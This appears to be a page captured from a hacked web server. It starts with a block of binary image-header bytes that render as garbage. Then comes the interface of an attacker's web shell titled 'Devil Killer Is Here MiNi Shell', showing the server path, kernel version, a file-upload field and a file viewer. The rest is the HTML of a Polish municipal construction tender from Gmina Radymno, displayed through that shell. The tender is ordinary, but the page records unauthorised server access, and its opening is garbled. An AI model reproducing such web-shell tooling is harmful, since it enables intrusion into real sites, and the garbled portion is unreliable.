JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250311/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250311/0013977301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa efektywności energetycznej w budynkach użyteczności publicznej oraz budowa i rozbudowa infrastruktury społeczno-kulturalnej w Gminie Radymno. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radymno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900536</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lwowska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radymno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-550</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugradymno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugradymno.ires.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej w budynkach użyteczności publicznej oraz budowa i rozbudowa infrastruktury społeczno-kulturalnej w Gminie Radymno. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6894ffa9-471d-4a3e-abc3-39e669f941e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00139773</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041390/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Poprawa efektywności energetycznej budynków użyteczności publicznej oraz budowa i rozbudowa infrastruktury społeczno-kulturalnej w Gminie Radymno.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6894ffa9-471d-4a3e-abc3-39e669f941e8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rozdział XII SWZ<br/>1. W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, z uwzględnieniem wyjątków określonych w ustawie Pzp,<br/>odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tekst jedn. Dz. U. z 2020 r.<br/>poz. 344).<br/>2. Niniejsze postępowanie prowadzone jest w języku polskim w formie elektronicznej przy użyciu Platformy e-Zamówienia, która<br/>dostępna jest pod adresem https://ezamowienia.gov.pl.<br/>3. Korzystanie z platformy zakupowej jest bezpłatne.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Przy porozumiewaniu się w ramach niniejszego postępowania Wykonawcy powinni posługiwać się znakiem postępowania: ZP.271.2.5.2025<br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (zw. dalej Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych);<br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych,<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach Rozporządzenie Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (zw. dalej rozporządzeniem w sprawie Krajowych Ram Interoperacyjności), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>9. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U.<br/>z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonymi odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa” (...)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem Państwa danych osobowych jest Wójt Gminy Radymno, z siedzibą przy<br/>ul. Lwowskiej 38, 37 – 550 Radymno.<br/>2) Dane kontaktowe inspektora ochrony danych: iodo@ugradymno.pl, tel. 16 628 11 38, pisemnie na adres Urzędu.<br/>3) Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia postepowania o<br/>udzielenie zamówienia publicznego na podstawie Pzp.<br/>4) Odbiorcami Państwa danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa.<br/>5) Państwa dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną i<br/>przepisami prawa.<br/>6) Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje<br/>niepodania określonych danych wynikają z Pzp.<br/>7) W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO.<br/>8) Posiadają Państwo:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych*;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO;<br/>9) Nie przysługuje Państwu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część I zamówienia obejmuje:<br/>1) Termomodernizację oraz remont budynku Urzędu Gminy Radymno:<br/>• opracowanie niezbędnej dokumentacji formalno-prawnej (w razie konieczności) oraz wzmocnienie fundamentów (na<br/>podstawie sporządzonej przez Wykonawcę i zatwierdzonej przez organ administracji architektoniczno-budowlanej - Starosty<br/>Powiatu Jarosławskiego dokumentacji projektowej opracowanej na podstawie EKSPERTYZY KONSTRUKCYJNEJ<br/>dotyczącej fundamentów oraz ścian konstrukcyjnych budynku siedziby Urzędu Gminy w Radymnie przy ul. Lwowskiej 38 z<br/>określeniem przyczyn powstałych zarysowań oraz wskazaniem sposobu ich naprawy;),<br/>• docieplenie budynku wraz z wykonaniem elewacji,<br/>• remont dachu,<br/>• remont części budynku przeznaczonej na archiwum Urzędu Gminy,<br/>• remont sanitariatów,<br/>• remont korytarzy i klatki schodowej,<br/>• remont pomieszczeń biurowych,<br/>• wymiana instalacji wewnętrznych (wodociągowej, kanalizacyjnej, elektrycznej z wymianą oświetlenia), • opracowanie niezbędnej dokumentacji (w razie konieczności) oraz dostawa i montaż instalacji fotowoltaicznej o mocy min.<br/>40 kW wraz z magazynem energii.<br/><br/>2) Przebudowę, nadbudowę, termomodernizację istniejącego budynku mieszkalnego (byłej szkoły) zlokalizowanej w miejscowości Ostrów, ze zmianą sposobu użytkowania na budynek użyteczności publicznej – opieki zdrowotnej:<br/>Przedmiotem postępowania jest termomodernizacja, przebudowa i nadbudowa istniejącego budynku mieszkalnego (byłej<br/>szkoły) ze zmianą sposobu użytkowania na budynek użyteczności publicznej - opieki zdrowotnej. Realizacja inwestycji<br/>zlokalizowana została na terenie dz. nr ewid. gr. 1240, obręb Ostrów położonej w miejscowości Ostrów, gmina Radymno<br/>wraz z instalacjami towarzyszącymi stanowiącymi wyposażenie przedmiotowego budynku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45261200-6 - Wykonywanie pokryć dachowych i malowanie dachów</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">400 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część II zamówienia obejmuje:<br/>1) Termomodernizację, remont oraz rozbudowę budynku świetlicy wiejskiej zlokalizowanej<br/>w miejscowości Korczowa:<br/>Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowej wraz<br/>z uzyskaniem niezbędnych uzgodnień formalno-prawnych (w tym koniecznych pozwoleń) oraz prace budowlane polegające<br/>na rozbudowie i przebudowie istniejącej świetlico-remizy tak aby osiągnąć założone cele opisane w PROGRAMIE<br/>FUNKCJONALNO-UŻYTKOWYM.<br/>W ramach przebudowy należy wykonać:<br/>• Rozebrać schody wewnętrzne z piwnicy na parter budynku. Strop w miejscu rozebranych schodów zabudować. Wejście do<br/>kondygnacji piwnic przewiduje się tylko od zewnątrz poprzez istniejące drzwi.<br/>• Przebudować istniejącą posadzkę w piwnicy, na parterze i na piętrze w sposób zapewniający im spełnienie aktualnych<br/>wymogów termicznych i wytrzymałościowych.<br/>• Rozebrać istniejące pokrycie z blachy trapezowej oraz istniejącą więźbę dachową. Materiał z rozbiórki poddać utylizacji.<br/>• Zdemontować istniejące na połaci dachowej panele fotowoltaiczne. Należy je ponownie zamontować na nowej połaci<br/>dachowej.<br/>• Nadbudować ściany piętra dla uzyskania pomieszczeń o wysokości min. 3,00 m.<br/>• Wykonać nową więźbę dachową. Dach dwuspadowy o nachyleniu połaci dachowej wynoszącej 15o. Konstrukcja dachu<br/>drewniana ciesielska lub z dźwigarów. Dach kryty blachą dachówkową powlekaną.<br/>• Wykonać wiatrołap przed drzwiami wejścia głównego. Wiatrołap o konstrukcji szkieletowej z dużymi przeszkleniami ze<br/>szkła bezpiecznego, wpasowany pod istniejące zadaszenie schodów. Wiatrołap wyposażony w drzwi dwuskrzydłowe<br/>wyjścia na schody główne oraz drzwi jednoskrzydłowe wyjścia<br/>w kierunku pochylni dla niepełnosprawnych.<br/>• Przebudować schody wejściowe oraz schody w elewacji tylnej, które należy wykonać z kostki betonowej brukowej<br/>ograniczonej palisadą betonową. W podobnej technologii wykonać pochylnię dla osób niepełnosprawnych.<br/>• Rozebrać strop nad parterem w korytarzu, w miejscu istniejących schodów i komunikacji oraz przebudować klatkę<br/>schodową z parteru na piętro w sposób zapewniający spełnienie wymagań wynikających z rozporządzenia Ministra<br/>Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich<br/>usytuowanie (tj. Dz. U. 2024 r. poz. 726<br/>z późniejszymi zmianami). Zamawiający dopuszcza rozwiązanie polegające na opracowaniu ekspertyzy technicznej<br/>dotyczącej spełnienia przepisów przeciwpożarowych dla przedmiotowej inwestycji w inny sposób niż określono w<br/>obowiązujących przepisach i uzyskania stosownego uzgodnienia rozwiązań zamiennych od Podkarpackiego Komendanta<br/>Wojewódzkiego Państwowej Straży Pożarnej w Rzeszowie.<br/>• Wymienić stolarkę drzwiową wewnętrzną na nową płycinową. Drzwi na drogach ewakuacyjnych wykonać z profili<br/>aluminiowych.<br/>• Wymienić stolarkę okienną na nową z profili pcv. Okna zlokalizowane na parterze i piętrze w salach wielofunkcyjnych<br/>zostały wymienione na nowe. Należy je pozostawić bez wymiany.<br/>• Wymienić stolarkę drzwiową zewnętrzną na nową z profili aluminiowych.<br/>• Wykonać nowe barierki i poręcze ze stali nierdzewnej.<br/>• Wykonać nową instalację wodno-kanalizacyjną, c.o., elektryczną.<br/>• Istniejące pomieszczenia wielofunkcyjne w kondygnacji parteru i piętra posiadają powierzchnię przekraczającą 50 m2.<br/>Należy w dokumentacji projektowej przewidzieć, że będą przeznaczone do jednoczesnego przebywania w nich nie więcej<br/>niż 50 osób.<br/>• Istniejące pomieszczenia sanitariatów należy przebudować zapewniając na każdej kondygnacji pomieszczenie sanitarne<br/>dla osób niepełnosprawnych, kobiet i mężczyzn.<br/>• Należy zapewnić dostępność budynku dla osób niepełnosprawnych. Wykonać podjazd dla osób niepełnosprawnych<br/>zapewniający możliwość korzystania pomieszczeń parteru przez osoby niepełnosprawne. Dla piętra dostęp przez osoby<br/>niepełnosprawne zapewnić poprzez montaż platformy przy schodowej. Zamawiający dopuszcza spełnienie wymogu poprzez<br/>dobudowanie windy zapewniającej dostęp osób niepełnosprawnych do kondygnacji parteru i piętra.<br/>• W części rozbudowanej zapewnić pomieszczenia o powierzchniach co najmniej wskazanych w części graficznej PF-U. Z<br/>projektowanej kotłowni należy zasilić instalację centralnego ogrzewania oraz c.w.u.<br/>w budynku istniejącym i rozbudowanym. Kocioł na opał stały – pellet.<br/>• Część rozbudowaną wyposażyć w instalacje:<br/>- wodno-kanalizacyjną,<br/>- c.o.,<br/>- elektryczną, w tym elektryczną syrenę alarmową,<br/>- wentylacji mechanicznej,<br/>- odciągi szynowe wentylacji mechanicznej w garażu samochodu straży pożarnej nr 1.1 i garażu karetek nr 1.2.<br/>• Budynek remizo-świetlicy: budynek częściowo podpiwniczony, piętrowy i częściowo parterowy,<br/>w technologii tradycyjnej, murowanej. W budynku powinny znajdować się pomieszczenia jakie wskazano w części graficznej<br/>i opisowej PF-U. Budynek wyposażony w instalacje wodno-kanalizacyjne, c.o., wentylacji mechanicznej oraz elektryczne.<br/>Planowana inwestycja w postaci robót projektowych i budowlanych związanych z budową sieci wodociągowej z przyłączami<br/>powinna być realizowana w oparciu o podstawowe wymagania, które 